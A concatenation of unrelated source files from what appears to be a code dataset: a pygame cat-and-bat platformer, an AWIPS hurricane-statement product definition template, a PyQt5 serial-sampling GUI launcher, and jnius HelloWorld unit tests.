            if e.key == key['escape']:
                run = False
            elif e.key == key['up']:
                jump[0] = True
            elif e.key == key['space']:
                somersault[0] = True
            elif e.key == key['down']:
                down[0] = True
            elif e.key == key['right']:
                SPEED = 1
            elif e.key == key['left']:
                SPEED = 0
            elif e.key == key['c'] and not somersault[0]:
                clr = random.choice(COLOR_CAT)  # cat color
                # Recolor every animation frame in place by replacing the
                # sampled fur color with the chosen one.
                for c, cat_color in enumerate(cat.images):
                    originalColor = cat_color.get_at((90, 108 if c == 10 else 40))
                    ar = pygame.PixelArray(cat_color)
                    ar.replace(originalColor, pygame.Color(clr), 0.1)
                    del ar
                images_cat = cat.images
            elif e.key == key['z']:
                alpha -= 25 if alpha > 5 else 5 if alpha > 0 else 0
            elif e.key == key['x']:
                alpha += 25 if alpha < 250 else 5 if alpha < 255 else 0
            elif e.key == key['m']:
                menu_on_off.reverse()
                if menu_on_off[0]:
                    sprites.add(menu, layer=2)
                elif not menu_on_off[0]:
                    sprites.remove(menu)
        elif e.type == key['type_up']:
            if e.key == key['down'] or e.key == key['up']:
                down[0] = False
                jump[0] = False
    # Repaint the last platform in a random color each time it wraps.
    if obj_sprite.rect.right == 0:
        obj_sprite.image.fill(pygame.Color(random.choice(COLOR)))
    sprites.update()
    screen.fill(NIGHT_BG_COLOR if day_night[0] else DAY_BG_COLOR)
    screen.blit(
        text.render(f'{bat2.score}', True, WHITE, None), (WIDTH_WIN // 2, 5))
    sprites.draw(screen)
    pygame.display.update()
    pygame.display.set_caption(f'CAT FPS: {int(clock.get_fps())}')
sys.exit(0)
|
import pygame
import os
import sys
import random
import ast
from colors import COLOR
def load_images(path) -> None:
    """Load every image file in *path* into the module-level ``images_list``.

    Files are loaded in sorted name order: later code indexes
    ``images_list`` positionally (e.g. [1] for the cat sheet, [0] for the
    bat sheet, [2] for the earth texture), and ``os.listdir`` alone returns
    entries in arbitrary, platform-dependent order, which silently broke
    those index-based lookups.  (The original ``-> list`` annotation was
    wrong: the function mutates the global list and returns None.)
    """
    for file_name in sorted(os.listdir(path)):
        images_list.append(pygame.image.load(os.path.join(path, file_name)))
def mask():
    # Rebuild the collision mask of every sprite in the module-level
    # collideGroup: pixels within threshold (1, 1, 1, 255) of the global
    # collideColor count as solid.  Called again whenever a ground sprite
    # swaps its image.
    for sp in collideGroup:
        # collideColor = sp.image.get_at((30, 15))
        sp.mask = pygame.mask.from_threshold(sp.image, collideColor, (1, 1, 1, 255))
class Menu(pygame.sprite.Sprite):
    """Static overlay sprite that renders the key-binding help text."""

    def __init__(self):
        pygame.sprite.Sprite.__init__(self)
        # One help line per supported key binding.
        self.text_list = [
            'space - somersault', 'm - menu', 'c - color selection',
            'z - -transparency', 'x - +transparency',
            '↓ - to lie', '↑ - jamp', '→ - go', '← - stop']
        self.text_pos = [10, 0]  # blit cursor; y advances per line
        self.width_string = []
        for string in self.text_list:
            self.width_string.append(text.size(string)[0])
        self.max_width_string = max(self.width_string)
        # Full line height including descender so lines do not overlap.
        self.max_height_string = text.get_height() + text.get_descent()
        self.top = text.get_height() - text.get_ascent()
        # Transparent surface just large enough for the whole help block.
        self.image = pygame.Surface((
            self.text_pos[0] + self.max_width_string,
            self.text_pos[1] + self.top + len(self.text_list) * self.max_height_string),
            flags=pygame.SRCALPHA)
        for txt in self.text_list:
            self.text_render = text.render(txt, True, WHITE, None)
            self.image.blit(self.text_render, self.text_pos)
            self.text_pos[1] += self.max_height_string
        self.rect = self.image.get_rect(topleft=(0, 0))
class Earth(pygame.sprite.Sprite):
    """Scrolling ground/platform sprite that wraps around the screen."""

    def __init__(self, x, y, img):
        pygame.sprite.Sprite.__init__(self)
        self.images = img  # candidate tile surfaces to cycle through
        self.index = 0
        self.range = len(self.images)
        self.image = self.images[self.index]
        self.rect = self.image.get_rect(topleft=(int(x), int(y)))

    def update(self):
        # Scroll left with the global SPEED; once a full screen-width
        # past the left edge, wrap to the right with a random new tile.
        self.rect.x -= SPEED
        if self.rect.x <= -WIDTH_WIN:
            self.rect.x = WIDTH_WIN
            self.index = random.randrange(self.range)
            self.image = self.images[self.index]
            mask()  # collision masks must be rebuilt for the new image
class Stars(pygame.sprite.Sprite):
    """A single drifting background star (night-sky layer 0)."""

    def __init__(self):
        pygame.sprite.Sprite.__init__(self)
        self.speed = random.randint(1, 2)   # leftward drift, px/frame
        self.size = random.randint(1, 3)    # radius in px
        # Spawn anywhere horizontally; keep stars above the ground strip.
        self.pos = random.randrange(WIDTH_WIN), random.randrange(HEIGHT_WIN - int(he * .7))
        self.image = pygame.Surface((self.size * 2, self.size * 2), pygame.SRCALPHA)
        # COLOR[238:262] is presumably a band of star-like shades in the
        # imported palette -- TODO confirm against colors.COLOR.
        pygame.draw.circle(self.image, pygame.Color(
            random.choice(COLOR[238:262])), [self.size, self.size], self.size)
        self.rect = self.image.get_rect(center=self.pos)

    def update(self):
        # Drift left; wrap to the right edge once fully off-screen.
        self.rect.x -= self.speed
        if self.rect.right < 0:
            self.rect.left = WIDTH_WIN
class Bat(pygame.sprite.Sprite):
    """Animated bat that rotates to face the cat and pulses in size."""

    def __init__(self, x, y, img):
        pygame.sprite.Sprite.__init__(self)
        self.images = img
        self.time = 0                 # animation clock (fractional frames)
        self.range = len(self.images)
        self.image = self.images[self.time]
        self.rect = self.image.get_rect(topleft=(x, y))
        # Fixed anchor point the bat rotates around / aims from.
        self.direction = pygame.math.Vector2(self.rect.center)
        self.bat_zoom = .4            # current scale factor
        self.zoom = 0                 # 0 = growing, 1 = shrinking

    def update(self):
        # Angle from the bat's anchor towards the cat's current position.
        bat_angle = self.direction.angle_to(cat.position - self.direction)
        # Re-derive every frame from the pristine module-level frames so
        # rotation/zoom errors do not accumulate.
        self.images = [pygame.transform.rotozoom(
            image, 180 - bat_angle, self.bat_zoom) for image in images_bat]
        self.time += 0.2
        self.image = self.images[int(self.time % self.range)]
        self.rect = self.image.get_rect(center=self.rect.center)
        # Ping-pong the zoom factor between .4 and .7.
        if self.zoom == 0:
            self.bat_zoom += .001
            if self.bat_zoom > .7:
                self.zoom = 1
        elif self.zoom == 1:
            self.bat_zoom -= .001
            if self.bat_zoom < .4:
                self.zoom = 0
class Bat2(pygame.sprite.Sprite):
    """Catchable bat that slides along the ground; scores when caught.

    Spawns off-screen to the right (between 1.4x and 1.9x the window
    width), drops onto the ground, and moves left at twice the scroll
    speed.  Each catch by the cat increments ``self.score``.
    """

    def __init__(self):
        pygame.sprite.Sprite.__init__(self)
        self.image = images_list[3]
        # BUG FIX: the spawn-range bounds must be ints -- random.randint()
        # rejects float arguments (DeprecationWarning on Python 3.10, an
        # error on 3.12), and WIDTH_WIN * 1.4 / * 1.9 are floats.
        self.pos = (int(WIDTH_WIN * 1.4), int(WIDTH_WIN * 1.9), HEIGHT_WIN - he)
        self.rect = self.image.get_rect(
            bottomleft=(random.randint(self.pos[0], self.pos[1]), self.pos[2]))
        self.group = pygame.sprite.GroupSingle(self)
        self.vel = 0     # vertical velocity
        self.score = 0   # number of times the cat has caught this bat

    def gravi(self):
        # Apply gravity only once on-screen, then settle on the ground by
        # backing out of any mask collision one step at a time.
        self.vel += GRAVI if self.rect.left < WIDTH_WIN else 0
        self.rect.centery += self.vel
        while pygame.sprite.spritecollideany(
                self, collideGroup, pygame.sprite.collide_mask):
            self.rect.centery -= GRAVI
            self.vel = 0

    def update(self):
        self.gravi()
        self.rect.centerx -= SPEED * 2
        if self.rect.right < 0:
            # Drifted off the left edge: respawn to the right.
            self.rect.bottomleft = random.randint(self.pos[0], self.pos[1]), self.pos[2]
        if pygame.sprite.spritecollideany(
                cat, self.group, pygame.sprite.collide_circle_ratio(0.75)):
            # Caught by the cat: respawn and count the catch.
            self.rect.bottomleft = random.randint(self.pos[0], self.pos[1]), self.pos[2]
            self.score += 1
class Cat(pygame.sprite.Sprite):
    """The player sprite: runs, jumps, lies down and somersaults.

    Reads several module-level flags and values updated by the main
    event loop: jump, down, somersault, SPEED, GRAVI, alpha, dt,
    images_cat and collideGroup.
    """

    def __init__(self, x, y, img):
        pygame.sprite.Sprite.__init__(self)
        self.images = img
        # Black pixels are treated as transparent in the sheet frames.
        [self_image.set_colorkey((0, 0, 0)) for self_image in self.images]
        self.time = 0
        # The last four frames are special poses, not run-cycle frames:
        # [-4] jump-up, [-3] jump-down, [-2] lying, [-1] standing still.
        self.range = len(self.images[:-4])
        self.range_jump_up = -4
        self.range_jump_down = -3
        self.range_down = -2
        self.range_stop = -1
        self.rot = 0  # current somersault rotation angle (degrees)
        self.image = self.images[self.time]
        self.rect = self.image.get_rect(center=(x, y))
        self.position = pygame.math.Vector2(self.rect.center)
        self.velocity = pygame.math.Vector2()
        self.velocity.x = SPEED
        self.width = self.image.get_width() // 2

    def flip(self):
        # Somersault: small upward kick plus 10-degree rotation steps
        # until a near-full turn (-300 degrees) completes, then reset.
        self.velocity.y = -5
        if self.rot > -300:
            self.rot -= 10
        else:
            self.rot = 0
            somersault[0] = False
        # Rebuild frames from the pristine module-level cat frames.
        self.images = [pygame.transform.rotate(image, self.rot) for image in images_cat]

    def animation(self):
        # Advance the run cycle by the frame delta, then override with a
        # special pose when a state flag demands it.
        self.time += dt
        self.image = self.images[int(self.time % self.range)]
        if down[0]:
            self.image = self.images[self.range_down]
        elif self.velocity.y < 0:
            self.image = self.images[self.range_jump_up]
        elif self.velocity.y > 4:
            self.image = self.images[self.range_jump_down]
        elif SPEED == 0:
            self.image = self.images[self.range_stop]

    def gravitation(self):
        self.velocity.y += GRAVI
        self.position += self.velocity

    def antigravity(self):
        # pygame.sprite.collide_mask
        # Push the cat back out of the ground after gravity moved it in.
        # NOTE(review): the whole body must sit inside the while -- the
        # loop condition tests self.rect, so the rect update has to run
        # each iteration or the loop would never terminate; keeping the
        # jump handling here also limits jumping to when grounded.
        while pygame.sprite.spritecollideany(
                self, collideGroup, pygame.sprite.collide_rect_ratio(0.97)):
            self.position.y -= GRAVI
            self.velocity.y = 0
            self.rect.centery = int(self.position.y)
            if jump[0]:
                self.velocity.y = -15
                self.velocity.x = 3
            else:
                self.velocity.x = SPEED

    def update(self):
        if somersault[0]:
            self.flip()
        self.animation()
        self.image.set_alpha(alpha)  # sprite transparency (z/x keys)
        self.gravitation()
        # Wrap horizontally once fully past the right edge.
        if self.position.x > WIDTH_WIN + self.width:
            self.position.x = -self.width
        self.rect = self.image.get_rect(center=list(map(int, self.position)))
        self.antigravity()
'-----------------------------------------------------------------------------'
# ---- module-level setup: window, input table, assets, sprite groups --------
os.environ['SDL_VIDEO_CENTERED'] = '1'  # center the game window
pygame.init()
WIDTH_WIN, HEIGHT_WIN = 960, 720
DAY_BG_COLOR, NIGHT_BG_COLOR = (100, 0, 255), (5, 0, 50)
screen = pygame.display.set_mode((WIDTH_WIN, HEIGHT_WIN))  # pygame.NOFRAME
pygame.mouse.set_visible(False)
text = pygame.font.SysFont('Arial', 22)
userevent = pygame.USEREVENT
pygame.time.set_timer(userevent, 60000)  # day/night toggle every 60 s
# Single lookup table for all event types and key codes used below.
key = {
    'type_quit': pygame.QUIT,
    'type_down': pygame.KEYDOWN,
    'type_up': pygame.KEYUP,
    'escape': pygame.K_ESCAPE,
    'up': pygame.K_UP,
    'space': pygame.K_SPACE,
    'down': pygame.K_DOWN,
    'right': pygame.K_RIGHT,
    'left': pygame.K_LEFT,
    'c': pygame.K_c,
    'z': pygame.K_z,
    'x': pygame.K_x,
    'm': pygame.K_m
}
FPS = 60
clock = pygame.time.Clock()
alpha = 255                    # cat sprite transparency (0..255)
# One-element lists so the sprite classes observe in-place mutations.
jump = [False]
down = [False]
somersault = [False]
menu_on_off = [True, False]
day_night = [False, True]
WHITE = (255, 255, 255)
SPEED = 0
GRAVI = 1
NUMBER_OF_STARS = 150
COLOR_CAT = ['red', 'green', 'royal blue', 'orange', 'olive drab', 'sienna4']
images_list = []
load_images('Images')
images_list[1] = images_list[1].convert()  # needed so set_alpha works
images_cat = []
images_bat = []
# texture.txt holds one dict literal per line describing the frame
# rectangles of each sprite sheet ('cat' / 'bat').
with open('texture.txt') as f:
    for lines in f:
        line = ast.literal_eval(lines)
        if 'cat' in line.keys():
            X, Y, W, h = line[str(*line.keys())].values()
            for n, w in enumerate(W):
                images_cat.append(images_list[1].subsurface((X[n], Y[n], w, h)))
        elif 'bat' in line.keys():
            X, Y, W, h = line[str(*line.keys())].values()
            for n, w in enumerate(W):
                images_bat.append(images_list[0].subsurface((X[n], Y[n], w, h)))
            height_bat = h
# Quarter the earth texture into four interchangeable ground tiles.
we, he = images_list[2].get_width() // 2, images_list[2].get_height() // 2
images_earth = [
    images_list[2].subsurface((0, 0, we, he)),
    images_list[2].subsurface((we, 0, we, he)),
    images_list[2].subsurface((0, he, we, he)),
    images_list[2].subsurface((we, he, we, he))
]
menu = Menu()
cat = Cat(WIDTH_WIN // 2, HEIGHT_WIN // 2, images_cat)
bat = Bat(WIDTH_WIN - height_bat, 0, images_bat)
bat2 = Bat2()
earth1 = Earth(0, HEIGHT_WIN - he, images_earth)
earth2 = Earth(WIDTH_WIN, HEIGHT_WIN - he, images_earth)
sprites = pygame.sprite.LayeredUpdates()
sprites.add(earth1, earth2, layer=1)
sprites.add(menu, layer=2)
sprites.add(bat, layer=2)
sprites.add(cat, bat2, layer=3)
collideGroup = pygame.sprite.Group(earth1, earth2)
for _ in range(NUMBER_OF_STARS):
    stars = Stars()
    sprites.add(stars, layer=0)
# Stars start removed (daytime); kept aside for night-time re-adding.
stars_list = sprites.remove_sprites_of_layer(0)
# Three floating yellow platforms, reusing Earth's scroll behaviour.
obj = [pygame.Surface((200, 20), pygame.SRCALPHA)]
obj[0].fill((200, 200, 20, 255))
objW, objH = obj[0].get_width(), obj[0].get_height()
for i in range(3):
    obj_sprite = Earth(WIDTH_WIN + objW * i, HEIGHT_WIN / 2.2 - objH * i * 3, obj)
    sprites.add(obj_sprite, layer=1)
    collideGroup.add(obj_sprite)
obj_sprite = sprites.get_sprites_from_layer(1)[-1]  # last platform only
collideColor = images_list[2].get_at((30, 30))
mask()
# ---- main loop: events, state flags, update/draw ---------------------------
run = True
while run:
    dt = clock.tick(FPS) / 150.  # frame delta used as the animation step
    for e in pygame.event.get():
        if e.type == key['type_quit']:
            run = False
        elif e.type == userevent:
            # 60-second timer: toggle day/night and the star layer.
            day_night.reverse()
            if day_night[0]:
                sprites.add(stars_list, layer=0)
            elif not day_night[0]:
                sprites.remove_sprites_of_layer(0)
        elif e.type == key['type_down']:
            if e.key == key['escape']:
                run = False
            elif e.key == key['up']:
                jump[0] = True
            elif e.key == key['space']:
                somersault[0] = True
            elif e.key == key['down']:
                down[0] = True
            elif e.key == key['right']:
                SPEED = 1
            elif e.key == key['left']:
                SPEED = 0
            elif e.key == key['c'] and not somersault[0]:
                clr = random.choice(COLOR_CAT)  # new cat colour
                for c, cat_color in enumerate(cat.images):
                    # Sample the current body colour; frame 10 is posed
                    # differently so it is sampled lower down.
                    originalColor = cat_color.get_at((90, 108 if c == 10 else 40))
                    ar = pygame.PixelArray(cat_color)
                    ar.replace(originalColor, pygame.Color(clr), 0.1)
                    del ar  # release the surface lock held by PixelArray
                images_cat = cat.images
            elif e.key == key['z']:
                alpha -= 25 if alpha > 5 else 5 if alpha > 0 else 0
            elif e.key == key['x']:
                alpha += 25 if alpha < 250 else 5 if alpha < 255 else 0
            elif e.key == key['m']:
                menu_on_off.reverse()
                if menu_on_off[0]:
                    sprites.add(menu, layer=2)
                elif not menu_on_off[0]:
                    sprites.remove(menu)
        elif e.type == key['type_up']:
            if e.key == key['down'] or e.key == key['up']:
                down[0] = False
                jump[0] = False
    if obj_sprite.rect.right == 0:
        # Recolour the last platform each time it crosses the left edge.
        obj_sprite.image.fill(pygame.Color(random.choice(COLOR)))
    sprites.update()
    screen.fill(NIGHT_BG_COLOR if day_night[0] else DAY_BG_COLOR)
    screen.blit(
        text.render(f'{bat2.score}', True, WHITE, None), (WIDTH_WIN // 2, 5))
    sprites.draw(screen)
    pygame.display.update()
    pygame.display.set_caption(f'CAT FPS: {int(clock.get_fps())}')
sys.exit(0)
|
ru
| 0.829995
|
# collideColor = sp.image.get_at((30, 15)) # pygame.sprite.collide_mask # прозрачность изображения # pygame.NOFRAME # для установки прозрачности # цвет кота
| 2.641851
| 3
|
edexOsgi/com.raytheon.edex.plugin.gfe/utility/common_static/base/gfe/textproducts/templates/utility/Hazard_HLS_Site_MultiPil_Definition.py
|
srcarter3/awips2
| 0
|
6628535
|
<reponame>srcarter3/awips2
##
# This software was developed and / or modified by Raytheon Company,
# pursuant to Contract DG133W-05-CQ-1067 with the US Government.
#
# U.S. EXPORT CONTROLLED TECHNICAL DATA
# This software product contains export-restricted data whose
# export/transfer/disclosure is restricted by U.S. law. Dissemination
# to non-U.S. persons whether in the United States or abroad requires
# an export license or other authorization.
#
# Contractor Name: <NAME>
# Contractor Address: 6825 Pine Street, Suite 340
# Mail Stop B8
# Omaha, NE 68106
# 402.291.0100
#
# See the AWIPS II Master Rights File ("Master Rights File.pdf") for
# further licensing information.
##
##
# This is a base file that is not intended to be overridden.
##
# ---------------------------------------------------------------------
# This software is in the public domain, furnished "as is", without
# technical support, and with no warranty, express or implied, as to
# its usefulness for any purpose.
#
# Hazard_HLS_<site>_<MultiPil>_Definition.TextUtility
#
# This file sets up all the Product Definition overrides for the
# Hazard_HLS formatter for a site.
#
# ---------------------------------------------------------------------
#**********************************************************************
# MAKE NO CHANGES HERE
# The minimum content of this file is the following Definition statement
Definition = {}
# End MAKE NO CHANGES HERE
#**********************************************************************
#####################################################
# Override VariableList if desired
#
#VariableList = []
#----- WFO <site> Hazard_HLS Definition -----
# Definition Statements must start in column 1.
# REQUIRED CONFIGURATION ITEMS
#Definition['displayName'] = None
Definition['displayName'] = "Hazard_HLS_<MultiPil> (Hurricane Local Statement)"
# Header configuration items
Definition["fullStationID"] = "<fullStationID>" # full station identifier (4letter)
Definition["wmoID"] = "<wmoID>" # WMO ID
Definition["pil"] = "<pil>" # product pil
Definition["textdbPil"] = "<textdbPil>" # Product ID for storing to AWIPS text database.
Definition["awipsWANPil"] = "<awipsWANPil>" # Product ID for transmitting to AWIPS WAN.
Definition["outputFile"] = "{prddir}/TEXT/Hazard_HLS_<MultiPil>.txt"
# OPTIONAL CONFIGURATION ITEMS
#Definition["database"] = "Official" # Source database. "Official", "Fcst", or "ISC"
#Definition["debug"] = 1
|
##
# This software was developed and / or modified by Raytheon Company,
# pursuant to Contract DG133W-05-CQ-1067 with the US Government.
#
# U.S. EXPORT CONTROLLED TECHNICAL DATA
# This software product contains export-restricted data whose
# export/transfer/disclosure is restricted by U.S. law. Dissemination
# to non-U.S. persons whether in the United States or abroad requires
# an export license or other authorization.
#
# Contractor Name: <NAME>
# Contractor Address: 6825 Pine Street, Suite 340
# Mail Stop B8
# Omaha, NE 68106
# 402.291.0100
#
# See the AWIPS II Master Rights File ("Master Rights File.pdf") for
# further licensing information.
##
##
# This is a base file that is not intended to be overridden.
##
# ---------------------------------------------------------------------
# This software is in the public domain, furnished "as is", without
# technical support, and with no warranty, express or implied, as to
# its usefulness for any purpose.
#
# Hazard_HLS_<site>_<MultiPil>_Definition.TextUtility
#
# This file sets up all the Product Definition overrides for the
# Hazard_HLS formatter for a site.
#
# ---------------------------------------------------------------------
#**********************************************************************
# MAKE NO CHANGES HERE
# The minimum content of this file is the following Definition statement
# Site-level overrides for the Hazard_HLS text formatter.  Tokens of the
# form <...> (e.g. <fullStationID>, <MultiPil>) are template placeholders
# substituted per site at install time.
Definition = {}
# End MAKE NO CHANGES HERE
#**********************************************************************
#####################################################
# Override VariableList if desired
#
#VariableList = []
#----- WFO <site> Hazard_HLS Definition -----
# Definition Statements must start in column 1.
# REQUIRED CONFIGURATION ITEMS
#Definition['displayName'] = None
Definition['displayName'] = "Hazard_HLS_<MultiPil> (Hurricane Local Statement)"
# Header configuration items
Definition["fullStationID"] = "<fullStationID>" # full station identifier (4letter)
Definition["wmoID"] = "<wmoID>" # WMO ID
Definition["pil"] = "<pil>" # product pil
Definition["textdbPil"] = "<textdbPil>" # Product ID for storing to AWIPS text database.
Definition["awipsWANPil"] = "<awipsWANPil>" # Product ID for transmitting to AWIPS WAN.
Definition["outputFile"] = "{prddir}/TEXT/Hazard_HLS_<MultiPil>.txt"
# OPTIONAL CONFIGURATION ITEMS
#Definition["database"] = "Official" # Source database. "Official", "Fcst", or "ISC"
#Definition["debug"] = 1
|
en
| 0.669679
|
## # This software was developed and / or modified by Raytheon Company, # pursuant to Contract DG133W-05-CQ-1067 with the US Government. # # U.S. EXPORT CONTROLLED TECHNICAL DATA # This software product contains export-restricted data whose # export/transfer/disclosure is restricted by U.S. law. Dissemination # to non-U.S. persons whether in the United States or abroad requires # an export license or other authorization. # # Contractor Name: <NAME> # Contractor Address: 6825 Pine Street, Suite 340 # Mail Stop B8 # Omaha, NE 68106 # 402.291.0100 # # See the AWIPS II Master Rights File ("Master Rights File.pdf") for # further licensing information. ## ## # This is a base file that is not intended to be overridden. ## # --------------------------------------------------------------------- # This software is in the public domain, furnished "as is", without # technical support, and with no warranty, express or implied, as to # its usefulness for any purpose. # # Hazard_HLS_<site>_<MultiPil>_Definition.TextUtility # # This file sets up all the Product Definition overrides for the # Hazard_HLS formatter for a site. # # --------------------------------------------------------------------- #********************************************************************** # MAKE NO CHANGES HERE # The minimum content of this file is the following Definition statement # End MAKE NO CHANGES HERE #********************************************************************** ##################################################### # Override VariableList if desired # #VariableList = [] #----- WFO <site> Hazard_HLS Definition ----- # Definition Statements must start in column 1. # REQUIRED CONFIGURATION ITEMS #Definition['displayName'] = None # Header configuration items # full station identifier (4letter) # WMO ID # product pil # Product ID for storing to AWIPS text database. # Product ID for transmitting to AWIPS WAN. 
# OPTIONAL CONFIGURATION ITEMS #Definition["database"] = "Official" # Source database. "Official", "Fcst", or "ISC" #Definition["debug"] = 1
| 1.102941
| 1
|
GUI/app.py
|
joshuamitchell192/DLS_Project
| 1
|
6628536
|
import configparser
import os
import sys
import threading
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import QApplication
from Controllers.controller import Controller
from Models.instructions import Instructions
from Models.sampleData import SampleData
from Services.serialConnection import SerialConnection
from Views.mainView import View
class App (QApplication):
    """Application wiring: model, serial connection, controller and view.

    Also spawns a daemon thread running the controller's serial read
    loop and seeds the view's widgets from ``settings.ini`` (located
    next to this file).
    """

    def __init__(self, sys_argv):
        super(App, self).__init__(sys_argv)
        # Resolve settings.ini relative to this file, not the CWD.
        self.absoluteInstallationPath = os.path.dirname(os.path.abspath(__file__))
        self.sampleData = SampleData()
        port = self.loadConfigComPort()
        self.serialConnection = SerialConnection(port)
        self.controller = Controller(self.serialConnection, Instructions, self.sampleData)
        self.view = View(self.serialConnection, self.controller, self.sampleData)
        self.view.show()
        thread = threading.Thread(target=self.controller.readLoop, args=())
        # probably should use a signalling mechanism like an Event to stop gracefully
        thread.daemon = True
        thread.start()
        self.loadConfig()
        self.view.calculateExpectedDuration()

    def loadConfigComPort(self):
        """Return the 'Port' value from [Default] in settings.ini, or ''."""
        config = configparser.ConfigParser()
        config.read(self.absoluteInstallationPath + '/settings.ini')
        if ('Default' in config):
            if ('Port' in config['Default']):
                return config['Default']['Port']
        return ""

    def loadConfig(self):
        """Seed the view's widgets from the [Default] section, if present.

        Each setting is optional; only 'SampleDuration' reports when it
        is missing.
        """
        config = configparser.ConfigParser()
        config.read(self.absoluteInstallationPath + '/settings.ini')
        if ('Default' in config):
            defaultSettings = config['Default']
            if ("SampleDuration" in defaultSettings):
                self.view.SmpDuration_SpinBox.setValue(float(defaultSettings['SampleDuration']))
            else:
                print("Failed to load 'SampleDuration' from 'Default' section from settings")
            if ("mmBetweenSamples" in defaultSettings):
                self.view.StepLength_LineEdit.setValue(float(defaultSettings['mmBetweenSamples']))
            if ("StartPosition" in defaultSettings):
                self.view.P1_Slider.setValue(int(defaultSettings["StartPosition"]))
                self.view.P1_SpinBox.setValue(int(defaultSettings["StartPosition"]))
            if ("EndPosition" in defaultSettings):
                self.view.P2_Slider.setValue(int(defaultSettings["EndPosition"]))
                self.view.P2_SpinBox.setValue(int(defaultSettings["EndPosition"]))
            if ("AverageInterval" in defaultSettings):
                self.view.AvgInterval_SpinBox.setValue(int(defaultSettings["AverageInterval"]))
if __name__ == '__main__':
    # High-DPI attributes must be set before the QApplication is created.
    if hasattr(Qt, 'AA_EnableHighDpiScaling'):
        QApplication.setAttribute(Qt.AA_EnableHighDpiScaling, True)
    QApplication.setAttribute(Qt.AA_DisableWindowContextHelpButton)
    QApplication.setAttribute(Qt.AA_UseStyleSheetPropagationInWidgetStyles, True)
    app = App(sys.argv)
    dirname = os.path.dirname(os.path.abspath(__file__))
    ssFile = os.path.join(dirname, "stylesheet.qss")
    # Qt stylesheets require forward slashes in url() even on Windows.
    dropDownPath = os.path.join(dirname, "Assets/baseline_arrow_drop_down_black_18dp.png").replace('\\', '/')
    with open(ssFile) as fh:
        styleSheet = fh.read()
    # Append the combo-box arrow rule, whose image path is only known
    # at runtime.
    styleSheet += """
    QComboBox::down-arrow {
        image: url(""" + dropDownPath + """);
    }
    """
    app.setStyleSheet(styleSheet)
    sys.exit(app.exec_())
|
import configparser
import os
import sys
import threading
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import QApplication
from Controllers.controller import Controller
from Models.instructions import Instructions
from Models.sampleData import SampleData
from Services.serialConnection import SerialConnection
from Views.mainView import View
class App (QApplication):
def __init__(self, sys_argv):
super(App, self).__init__(sys_argv)
self.absoluteInstallationPath = os.path.dirname(os.path.abspath(__file__))
self.sampleData = SampleData()
port = self.loadConfigComPort()
self.serialConnection = SerialConnection(port)
self.controller = Controller(self.serialConnection, Instructions, self.sampleData)
self.view = View(self.serialConnection, self.controller, self.sampleData)
self.view.show()
thread = threading.Thread(target=self.controller.readLoop, args=())
# probably should use an signalling mechanism like an Event to stop gracefully
thread.daemon = True
thread.start()
self.loadConfig()
self.view.calculateExpectedDuration()
def loadConfigComPort(self):
config = configparser.ConfigParser()
config.read(self.absoluteInstallationPath + '/settings.ini')
if ('Default' in config):
if ('Port' in config['Default']):
return config['Default']['Port']
return ""
def loadConfig(self):
config = configparser.ConfigParser()
config.read(self.absoluteInstallationPath + '/settings.ini')
if ('Default' in config):
defaultSettings = config['Default']
if ("SampleDuration" in defaultSettings):
self.view.SmpDuration_SpinBox.setValue(float(defaultSettings['SampleDuration']))
else:
print("Failed to load 'SampleDuration' from 'Default' section from settings")
if ("mmBetweenSamples" in defaultSettings):
self.view.StepLength_LineEdit.setValue(float(defaultSettings['mmBetweenSamples']))
if ("StartPosition" in defaultSettings):
self.view.P1_Slider.setValue(int(defaultSettings["StartPosition"]))
self.view.P1_SpinBox.setValue(int(defaultSettings["StartPosition"]))
if ("EndPosition" in defaultSettings):
self.view.P2_Slider.setValue(int(defaultSettings["EndPosition"]))
self.view.P2_SpinBox.setValue(int(defaultSettings["EndPosition"]))
if ("AverageInterval" in defaultSettings):
self.view.AvgInterval_SpinBox.setValue(int(defaultSettings["AverageInterval"]))
if __name__ == '__main__':
if hasattr(Qt, 'AA_EnableHighDpiScaling'):
QApplication.setAttribute(Qt.AA_EnableHighDpiScaling, True)
QApplication.setAttribute(Qt.AA_DisableWindowContextHelpButton)
QApplication.setAttribute(Qt.AA_UseStyleSheetPropagationInWidgetStyles, True)
app = App(sys.argv)
dirname = os.path.dirname(os.path.abspath(__file__))
ssFile = os.path.join(dirname, "stylesheet.qss")
dropDownPath = os.path.join(dirname, "Assets/baseline_arrow_drop_down_black_18dp.png").replace('\\', '/')
with open(ssFile) as fh:
styleSheet = fh.read()
styleSheet += """
QComboBox::down-arrow {
image: url(""" + dropDownPath + """);
}
"""
app.setStyleSheet(styleSheet)
sys.exit(app.exec_())
|
en
| 0.818897
|
# probably should use an signalling mechanism like an Event to stop gracefully QComboBox::down-arrow { image: url( ); }
| 2.550504
| 3
|
tests/test_simple.py
|
karpierz/jtypes.pyjnius
| 0
|
6628537
|
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
import unittest
from jnius import JavaClass, MetaJavaClass, JavaMethod
from jnius import metaclass, java_class # <AK> for jt.jnius additions
from jnius import JavaField, JavaException # -||-
from six import with_metaclass
class HelloWorldTest(unittest.TestCase):
    """Smoke tests for the different ways of declaring a Java proxy class."""

    def test_helloworld(self):
        # Classic six.with_metaclass declaration.
        class HelloWorld(with_metaclass(MetaJavaClass, JavaClass)):
            __javaclass__ = 'org/jnius/HelloWorld'
            hello = JavaMethod('()Ljava/lang/String;')
        a = HelloWorld()
        self.assertEqual(a.hello(), 'world')

    # <AK> additions for jt.jnius
    def test_helloworld1(self):
        # metaclass() decorator with an explicit JavaClass base.
        @metaclass(MetaJavaClass)
        class HelloWorld(JavaClass):
            __javaclass__ = 'org/jnius/HelloWorld'
            hello = JavaMethod('()Ljava/lang/String;')
        a = HelloWorld()
        self.assertEqual(a.hello(), 'world')

    def test_helloworld2(self):
        # metaclass() decorator on a plain object subclass.
        @metaclass(MetaJavaClass)
        class HelloWorld(object):
            __javaclass__ = 'org/jnius/HelloWorld'
            hello = JavaMethod('()Ljava/lang/String;')
        a = HelloWorld()
        self.assertEqual(a.hello(), 'world')

    def test_helloworld3(self):
        # java_class() decorator; Java class name taken from __javaclass__.
        @java_class()
        class HelloWorld(object):
            __javaclass__ = 'org/jnius/HelloWorld'
            hello = JavaMethod('()Ljava/lang/String;')
        a = HelloWorld()
        self.assertEqual(a.hello(), 'world')

    def test_helloworld4(self):
        # java_class() decorator with the Java class name passed inline.
        @java_class('org/jnius/HelloWorld')
        class HelloWorld(object):
            hello = JavaMethod('()Ljava/lang/String;')
        a = HelloWorld()
        self.assertEqual(a.hello(), 'world')

